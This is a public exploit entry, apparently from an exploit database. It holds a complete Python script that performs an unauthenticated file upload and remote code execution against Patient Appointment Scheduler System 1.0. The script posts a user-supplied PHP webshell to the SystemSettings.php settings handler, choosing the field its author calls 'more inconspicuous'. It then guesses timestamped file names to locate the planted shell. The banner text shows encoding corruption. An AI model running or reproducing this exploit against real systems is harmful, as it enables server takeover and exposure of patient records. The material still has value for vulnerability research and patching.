Share
## https://sploitus.com/exploit?id=1337DAY-ID-36719
# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)
# Exploit Author: a-rey 
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os
import time
import logging
import requests
import argparse

BANNER = """
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
 by: \033[0m\033[1;31m โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—      โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—\033[0m
     \033[0m\033[1;32mโ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—     โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘\033[0m
     \033[0m\033[1;33mโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•โ•\033[0m
     \033[0m\033[1;34mโ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•     โ–ˆโ–ˆโ•”โ•  \033[0m
     \033[0m\033[1;35mโ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•‘   \033[0m
     \033[0m\033[1;36mโ•šโ•โ•  โ•šโ•โ•     โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•   โ•šโ•โ•   \033[0m
"""


def exploit(url:str, file:str, delay:int) -> None:
  if not os.path.exists(file):
    logging.error(f'webshell payload "{file}"" does not exist?')
    return
  logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
  uploadTime = int(time.time())
  r = requests.post(url + '/classes/SystemSettings.php', 
    files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
    params={'f' : 'update_settings'},
    verify=False
  )
  if not r.ok:
    logging.error('HTTP upload request failed')
    return
  logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
  for i in range(uploadTime - delay, uploadTime + delay + 1):
    r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
    logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
    # NOTE: website will send redirects for all files that do not exist
    if r.status_code != 302:
      logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
      return
  logging.error('failed to find payload on target')
  logging.warning('maybe need a larger delay or uploads directory is not writable?')
  return
  
  
if __name__ == '__main__':
  # parse arguments
  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
  parser.add_argument('-u', '--url',     help='website URL',                                                  type=str, required=True)
  parser.add_argument('-p', '--payload', help='PHP webshell file to upload',                                  type=str, required=True)
  parser.add_argument('-d', '--delay',   help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
  parser.add_argument('--debug',         help='enable debugging output',                                      action='store_true', default=False)
  args = parser.parse_args()
  # define logger
  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
  logging.SUCCESS = logging.CRITICAL + 1
  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
  # print banner
  print(BANNER)
  # run exploit
  exploit(args.url, args.payload, args.delay)